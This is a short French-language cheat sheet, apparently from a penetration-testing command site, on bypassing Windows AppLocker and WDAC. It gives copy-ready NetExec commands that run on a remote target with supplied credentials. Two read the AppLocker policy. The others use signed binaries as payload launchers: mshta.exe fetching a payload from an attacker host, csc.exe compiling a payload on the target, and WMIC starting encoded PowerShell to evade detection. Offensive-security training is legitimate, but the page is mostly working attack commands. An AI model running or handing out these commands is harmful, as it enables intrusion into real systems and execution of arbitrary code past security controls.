Exploitation

AppLocker / WDAC Bypass

Contourner les restrictions AppLocker et WDAC via des LOLBAS et des techniques de compilation.

Copy command

nxc smb $TARGET -u $USER -p $PASS -x 'Get-AppLockerPolicy -Effective | ConvertTo-Xml'

Description: Récupérer la politique AppLocker effective : identifier les règles et leurs exceptions.

Copy command

nxc smb $TARGET -u $USER -p $PASS -x 'reg query HKLM\Software\Policies\Microsoft\Windows\SrpV2'

Description: Lire la config AppLocker depuis le registre : plus rapide que la cmdlet PowerShell.

Copy command

nxc smb $TARGET -u $USER -p $PASS -x 'C:\Windows\System32\mshta.exe http://$ATTACKER_IP/payload.hta'

Description: Bypass via mshta.exe : binaire signé Microsoft souvent absent des listes de blocage.

Copy command

nxc smb $TARGET -u $USER -p $PASS -x 'C:\Windows\Microsoft.NET\Framework64\$VER\csc.exe /out:C:\Temp\payload.exe payload.cs'

Description: Compiler un payload on-the-fly via csc.exe : contourne les restrictions sur les executables.

Copy command

nxc smb $TARGET -u $USER -p $PASS -x 'wmic process call create "powershell -enc $BASE64"'

Description: Lancer PowerShell encodé via WMIC : contourne certaines détections de process spawn direct.